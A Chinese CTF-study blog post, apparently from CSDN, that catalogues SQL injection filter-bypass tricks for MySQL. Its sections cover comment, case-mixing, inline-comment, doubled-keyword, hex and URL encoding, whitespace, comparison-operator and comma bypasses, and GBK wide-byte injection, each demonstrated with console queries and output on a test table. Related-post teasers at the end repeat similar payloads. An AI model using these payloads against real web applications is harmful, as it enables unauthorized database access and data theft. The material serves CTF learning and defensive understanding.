ctf sql注入关键词绕过【积累中】

最新推荐文章于 2024-08-29 20:15:55 发布
最新推荐文章于 2024-08-29 20:15:55 发布
阅读量2.2w 收藏 64
点赞数 12
文章标签: ctf mysql sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wy_97/article/details/78085664
版权

写在前面:这个博客知识点来源于个人ctf练习比赛中积累的知识点及网络中各个博客的总结点,这里做测试和记录

 

0x00 sql注入理解

    SQL注入能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 SQL是结构化查询语言的简称,它是访问数据库的事实标准。目前,大多数Web应用都使用SQL数据库来存放应用程序的数据。几乎所有的Web应用在后台 都使用某种SQL数据库。跟大多数语言一样,SQL语法允许数据库命令和用户数据混杂在一起的。如果开发人员不细心的话,用户数据就有可能被解释成命令, 这样的话,远程用户就不仅能向Web应用输入数据,而且还可以在数据库上执行任意命令了。

    sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量;但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。

    比如语句 String sql = "select id,no from user where id=" + id;
我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,但是当输入了: 2 or 1=1 时,其中的 or 1=1 并没有作为 where id= 的字面值,而是作为了 sql语句 来执行的。所以其本质是将用户的输入的数据,作为了命令来执行。

 

测试环境:Server version: 5.7.17-log MySQL Community Server (GPL)

0x01 sql注入绕过

1.1 注释符绕过

常用注释符:

 -- , /**/, #


验证:

mysql> select * from sql_test where id = /*11*/1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from sql_test where id = 3;-- select * from sql_test;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test2    | 456      |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from sql_test where id = 3;# select * from sql_test;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test2    | 456      |
+----+----------+----------+
1 row in set (0.00 sec)

这里还从别的表哥博客中发现了一种新姿势:

 

mysql> select * from sql_test where id ='1'/1=(1=3)/'1'='1';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | test     | 234      |
|  3 | test2    | 456      |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql> select * from sql_test where id ='1'/1=(1=1)/'1'='1';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
+----+----------+----------+
1 row in set (0.00 sec)

理解如下:

 

 

where id=1=0/1=1
->where id=1=0=1
id!=1,比如id=2 和 id=3的时候
id=1返回了一个值为0的布尔变量
0=0继而返回了1的布尔变量
再和=1比较,返回比较成功,故选取了id2,3的记录

 

 

先除后判等,左往右

 

 

1.2 大小写绕过

    sql语句忽略关键词是否大小写,其实只要waf不是故意这样设计的,基本上拦截都是大小写一起拦截的

mysql> select * from sql_test where id = 3 uniON sEleCt  * from sql_test where id = 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test2    | 456      |
|  2 | test     | 234      |
+----+----------+----------+
2 rows in set (0.00 sec)

 

1.3 内联注释绕过

 

    ummmm,解释起来就是,它把一些特有的仅在MYSQL上的语句放在 /*! ... */ 中,这样这些语句如果在其它数据库中是不会被执行,但在MYSQL中它会执行

mysql> select * from sql_test where id = 3 union /*!select*/  * from sql_test where id like 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test2    | 456      |
|  2 | test     | 234      |
+----+----------+----------+
2 rows in set (0.00 sec)

 

1.4 双关键字绕过

 

?id=1+UNIunionON+SeLselectECT+1,2,3–

    这个一般用于简易waf,好心办坏事,比如说他将关键词select忽略大小写,只要有这个词,就把它替换成空(注意,只替换一次),这样原先我们注入的seleselectct是错误的,识别不出来的,但是经过waf 就变成了select,可以正确识别

 

1.5 编码绕过

双重url编码,这个得遇到特殊题目可以这么做,后台可能代码如下:

$insert=$link->query(urldecode($_GET['id']));
$row=$insert->fetch_row();

16进制绕过:

mysql> select * from sql_test where id = 3 union select  * from sql_test where username = 0x74657374;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test2    | 456      |
|  2 | test     | 234      |
+----+----------+----------+
2 rows in set (0.06 sec)
mysql> select  * from sql_test where username = char(116)+char(101)+char(115)+char(116);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
|  2 | test     | 234      |
|  3 | test2    | 456      |
+----+----------+----------+
3 rows in set, 3 warnings (0.00 sec)

 

1.6 空格绕过

 

    waf拦截了空格,怎么办?五种考虑,用双空格/制表符代替尝试,用/**/当做空格,用括号包起来进行,用回车代替空格,反引号`的使用

mysql> select(id)from(sql_test)where(id=1);
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
mysql> select/**/id/**/from/**/sql_test/**/where/**/id=1/**/;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
mysql> select
    -> id
    -> from
    -> sql_test
    -> where
    -> id
    -> =
    -> 1
    -> ;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)

注:url中%0a为回车

mysql> select   username        from    sql_test        where   id=1    ;
+----------+
| username |
+----------+
| admin    |
+----------+
1 row in set (0.00 sec)
mysql> select*from`sql_test`where`id`=1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
+----+----------+----------+
1 row in set (0.00 sec)

 

 

1.7  等于号绕过

 

 

    拦截了等于号,我们可以用like去代替:

mysql> select * from sql_test where username like 'admin';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
+----+----------+----------+
1 row in set (0.00 sec)

 

1.8 逗号绕过

 

    在使用盲注的时候,需要使用到substr(),mid(),limit;这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from for的方式来解决,limit则可以用offset

mysql> select * from sql_test where ascii(mid(username from 1 for 1))>1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
|  2 | test     | 234      |
|  3 | test2    | 456      |
+----+----------+----------+
3 rows in set (0.00 sec)

mysql> select * from sql_test where ascii(mid(username from 1 for 1))>97;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | test     | 234      |
|  3 | test2    | 456      |
+----+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from sql_test where ascii(substr(username from 1 for 1))>97;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | test     | 234      |
|  3 | test2    | 456      |
+----+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from sql_test limit 1 offset 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | test     | 234      |
+----+----------+----------+
1 row in set (0.00 sec)

 

1.9 大于号小于号拦截绕过

 

    在使用盲注的时候,在爆破的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符,那么就需要使用到greatest,strcmp,in,between来进行绕过了。

mysql> select * from sql_test where id=1 and greatest(ascii(substr(username,1,1)),1)=97;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
+----+----------+----------+
1 row in set (0.05 sec)
mysql> select * from sql_test where id=1 and strcmp(ascii(substr(username,1,1)),1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
+----+----------+----------+
1 row in set (0.03 sec)

mysql> select * from sql_test where id=1 and strcmp(ascii(substr(username,1,1)),97);
Empty set (0.00 sec)

 

mysql> select * from sql_test where id = 1 and substr(username,1,1) in ('a');
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
+----+----------+----------+
1 row in set (0.23 sec)

mysql> select * from sql_test where id = 1 and substr(username,1,1) in ('b');
Empty set (0.00 sec)
mysql> select * from sql_test where id = 1 and substr(username,1,1) between 0x61 and 0x63;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from sql_test where id = 1 and substr(username,1,1) between 'a' and 'c';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 123456   |
+----+----------+----------+
1 row in set (0.00 sec)

 

 

2.0 宽字节注入

 

过滤单引号时,可以试试宽字节
%bf%27 %df%27 %aa%27

 

    %df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在%df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。

 

2.1 常用连接语句符号

 

or,and,union,&&,||,^


^指的是异或操作,通常用于布尔型盲注绕过连接词

 

 

 

 

2.2 几个报错注入用来绕过的函数

extractvalue/updatexml

解释太复杂了,这里有详解,点这里

 

2.7 \N,E0,.0绕过

其实相当于NULL字符

 

mysql> select*from sql_test where id =\Nunion select * from sql_test where id=2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | test     | 234      |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select*from sql_test where id =8E0union select * from sql_test where id=2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | test     | 234      |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select*from sql_test where id =8.0union select * from sql_test where id=2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | test     | 234      |
+----+----------+----------+
1 row in set (0.06 sec)
mysql> select*from sql_test where id =7E0;
Empty set (0.00 sec)

mysql> select*from sql_test where id =7.0;
Empty set (0.00 sec)

mysql> select*from sql_test where id =\N;
Empty set (0.00 sec)

 

 

 

 

 

 

Sp4rkW
关注
专栏目录
SQL注入-绕过WAF以及一些注入手段
qq_25899635的博客
05-23 5279
大小写绕过   如果程序设置了过滤关键字,但是过滤过程并没有对关键字组成进行深入分析过滤,导致只对整体进行过滤。例如:and过滤。当然这种过滤只是发现关键字出现,并不会对关键字处理。可以通过修改关键字的内字母大小写来绕过过滤措施。 双写绕过   如果在程序设置出现关键字之后替换为空,那么SQl注入攻击也不会发生。对于这样的过滤策略可以使用双写绕过。因为在过滤过程只进行了一次替换。 例如:过...
CTF之web学习记录 -- SQL注入检测绕过
lifanxin的博客
05-19 1013
SQL注入检测绕过概述大小写绕过双写绕过编码绕过内联注释绕过总结 概述   在学习了一些基本的sql注入知识以及注入技巧后,本篇博客将会总结一些常见的sql注入检测绕过方法。 大小写绕过   大小写绕过很好理解,后端程序会过滤掉一些关键词,比如:select/union/and,此时就无法达到注入的效果。想要绕过这种检测,只需要大写某些字母即可,比如:selEct/UniOn/And,之所以可以这样绕过,一是因为后端的检测逻辑不够完善,二是mysql并不区分大小写。 双写绕过   双写绕过ctf比赛十分
SQL注入学习总结(四):SQL注入绕过
weixin_30718391的博客
09-13 475
SQL注入绕过 一.对于关键字绕过 注释符绕过:uni/**/on se/**/lect 大小写绕过:UniOn SeleCt 双关键字绕过:ununionion seselectlect <>绕过:unio<>n sel<>ect(可能是有些网站为了防止xss注入,所以过滤了<>,参照i春秋sql) 对于and,or的绕过其实还可以尝试一下...
SQL注入实战:mysql绕过
moyuan_4s的博客
08-11 1211
(1)greatest(n1,n2,n3,...) //返回其的最大值 (2)strcmp(str1,str2) //当str1=str2,返回0,当str1>str2,返回1,当str1
SQL注入漏洞(绕过篇)
errorr0
06-24 4907
SQL注入绕过手法
sql注入 绕过
weixin_54472394的博客
06-05 177
2.单双引号 注释 过滤 3.双写绕过 4.关键字过滤 5.全部查出来 参数污染 一个成立即可 6.空格过滤 7.大小写 二次注入
SQL注入绕过
qq_41007744的博客
05-04 993
使用空字节要想执行空字节攻击,只需在过滤器阻止的字符前面提供一个采用URL编码的空字节即可。%00' union select password from tblUsers where username='admin' --+大小写变种如果某些关键字过滤器不够聪明,可以使用变换攻击字符串字符的大小来避开'uNiOn SeLeCt password frOm tblUsers WhErE user...
[ctf sql]绕过sql语句过滤
qq_37301470的博客
11-12 667
过滤 过滤 单引号 逃逸出攻击语句 php语句 sql=select * form users where username='$POST["name"]' and password ='$_POST["pwd"]'; 如果能同时传值给name和pwd 那么 name=admin\ pwd= and 1=1 # 拼接后 sql= select * form users where username='admin\' and password ='and 1=1 #'; 成功令后一个pwd的引号与name的引
关于SQL注入绕过逗号过滤
weixin_43247256的博客
01-27 7075
CTF sql注入题目。
SQL注入绕过的技巧总结
12-14
这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程,所使用到的sql注入绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。  一、引号绕过  会使用到引号的地方是在于后的whe
mysql注入ctf_CTF SQL注入
weixin_42510026的博客
01-28 675
一、宽字节注入原理:GBK编码、URL转码利用mysql的一个特性,mysql在使用GBK编码的时候,会认为两个字符是一个汉字(前一个ASCII码要大于128,才到汉字的范围)例如:' -> ' -> %5C%27%df' -> %df' -> %df%5C%27sql字符集特性MYSQL utf8_unicode_ci 和 utf8_general...
SQL注入绕过
梁顿的专栏
10-10 604
UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b实际上也就相当于UNION SELECT 1,2
生命在于学习——SQL注入绕过
易水哲的博客
08-17 1万+
SQL注入绕过技术已经是一个老生常淡的内容了
SQL注入-绕过篇】
最新发布
m0_62373986的博客
08-29 536
绕过\的关键点在于网站在对输入数据进行处理时,只进行了一次URL编码,所以将%25转化成%后,不会再检查后面的%27。1、宽字节注入在上一篇博客讲到,是因%df+%5c结合为一个宽字节因为GBK编码组合成一个汉字,从而使\失效。2、除此之外,若\没有被网站过滤,也可以利用\对字符的转义来进行SQL注入。网站初次检测用户输入%2527,因为URL编码将%25转化成%,此时用户输入未检测到特殊字符,直接将%27输入到数据库。2、若\没有被过滤,使用\令闭合符失效。1、宽字节绕过(%df%5c)
SQL注入漏洞-绕过
HacHunter的博客
03-08 6798
绕过条件过滤 掌握了基本的注入手段。但是随着网站开发人员的安全意识的提高,纷纷使用了各种防注入的手段。最简单的就是条件过滤了。条件过滤,顾名思义就是黑名单机制,过滤掉符合条件的语句。因此我们要想办法绕过过滤,用其他方式来实现注入。 绕过伪静态 伪静态:伪静态通俗点说就是假的静态页面,也就是通过各种技术手段,让动态页面的URL看上去和静态页面的一样。 .htaccess文件是Apache服务器的一个配置文件,它负责相关目录下的网页配置。 我们这里利用.htaccess文件,配置重写引擎,来实现伪静
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
热门推荐
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
sql注入各种绕过
weixin_42478365的博客
08-01 8491
sql注入绕过
SQL注入_WITH ROLLUP绕过
giun的博客
04-09 1017
题目地址 http://ctf5.shiyanbar.com/web/pcat/index.php <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'....
ctf sql注入题目
09-15
CTF(Capture The Flag)SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是一道较为简单的SQL注入题目,提供了一个特定的注入点,要求参与者利用SQL注入漏洞获取特定的信息或完成特定的任务。 2. CTFSHOW-sql注入(一) 这是CTFSHOW平台上的一个系列题目,主要介绍了SQL注入的基础知识点和常见题型。参与者可以通过完成不同的题目来逐步提升自己的SQL注入技能。 3. web 171(万能密码) 这是一个具有万能密码漏洞的网页应用题目。参与者需要在登录页面的密码字段输入特定的注入payload,以绕过身份验证,获取敏感信息或进行其他未授权的操作。 4. web 172(过滤回显内容) 这是一个具有回显内容过滤漏洞的网页应用题目。参与者需要在输入框构造特定的注入payload,以绕过过滤机制并成功回显注入结果。 这些题目的目的是帮助参与者了解、掌握和应用SQL注入漏洞的原理和技巧,提高其对于Web应用安全的认识和实践能力。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值